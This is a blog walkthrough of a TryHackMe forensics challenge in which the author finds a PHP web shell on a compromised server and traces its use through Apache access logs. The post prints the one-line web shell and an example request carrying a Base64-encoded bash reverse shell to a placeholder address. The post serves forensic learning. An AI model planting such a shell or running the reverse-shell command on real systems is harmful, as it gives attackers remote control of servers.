Challenges: Infinity Shell (TryHackMe)


The Infinity Shell forensics challenge focuses on investigating a compromised web server that had been exploited by attackers. Instead of the usual network scans and web enumeration, the challenge requires digging into the server's file structure and log files to trace attacker activity. The attackers had uploaded a PHP-based web shell capable of executing Base64-encoded commands, and the task is to reconstruct how it was used and ultimately extract the flag from their activity.
Set up your virtual environment
To successfully complete this room, you'll need to set up your virtual environment. This involves starting the Target Machine, ensuring you're equipped with the necessary tools and access to tackle the challenges ahead.
Cipher’s legion of bots has exploited a known vulnerability in our web application, leaving behind a dangerous web shell implant. Investigate the breach and trace the attacker's footsteps!
Note: Click the Start Machine button to spawn the Virtual Machine.
Answer the questions below
What is the flag?
Tried doing basic enumeration using tools like nmap
, gobuster
and visiting the site but none of it was a success. Got a 405 on the site which I concluded that maybe they didn’t anticipate for us to use these tools or access the site that much.
Later looked for hints on other walkthroughs and learned that there’s a CMS site that’s within the /var/www/html
.
the CMS has an img folder that has a images.php file which
<?php system(base64_decode($_GET['query'])); ?>
Understanding how the PHP Web Shell Executes Base64-Encoded Commands
Had to ask ChatGPT what this code does since I’m still learning and learn how we ended up getting the base64 hash in the logs that helped us get the flag
What does this PHP code do?
<?php system(base64_decode($_GET['query'])); ?>
$_GET['query']
→ takes a value from the query string (like?query=abc123
)base64_decode()
→ decodes that value from Base64system()
→ executes the decoded value as an OS command
Why look in /var/log
?
Web servers log every request.
Apache or Nginx keeps logs (usually in/var/log/apache2/access.log
or/var/log/nginx/access.log
).The attacker would need to trigger this file with something like:
http://<server>/CMSsite-master/img/images.php?query=YmFzaCAtaSA+JiAvZGV2L3RjcC94eC54eC54eC54eDo4MDgwID4mMQ==
That Base64 payload gets recorded in the access logs because the URL (including query parameters) is always logged by default.
Hence, forensic logic:
Look at how attackers interacted with the web shell → access logs
Extract the
query
parameter from logs → it's Base64 encoded → decode it → find out what commands they executed.
So the hint came from:
The code itself tells us how attackers interacted:
Only one entry point:
images.php?query=...
Payloads must be Base64
In real-world forensic thinking:
- If an RCE was discovered, logs are your timeline of attacker activity.
logs
Had to check the /var/log/apache
for the logs files for the site
I used the cat other_vhosts_access.log.1
and had to scroll a lot before I found the Base64 query hash. If you’ll be following this you can use either of these commands instead
cat other_vhosts_access.log.1 | grep "images.php"
grep "images.php" other_vhosts_access.log.1
I used Base64Decode site to decode the base64 hash
This challenge was a valuable exercise in understanding how attackers leverage simple PHP web shells and how their activity can still be traced through web server logs. By identifying the malicious images.php
file, understanding its behavior, and reviewing Apache access logs, we could reconstruct the commands executed by the attacker. This reinforces an important forensic principle: even when attackers attempt to hide their actions, server logs often provide the evidence needed to uncover their activities.
Subscribe to my newsletter
Read articles from Jebitok directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by

Jebitok
Jebitok
Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.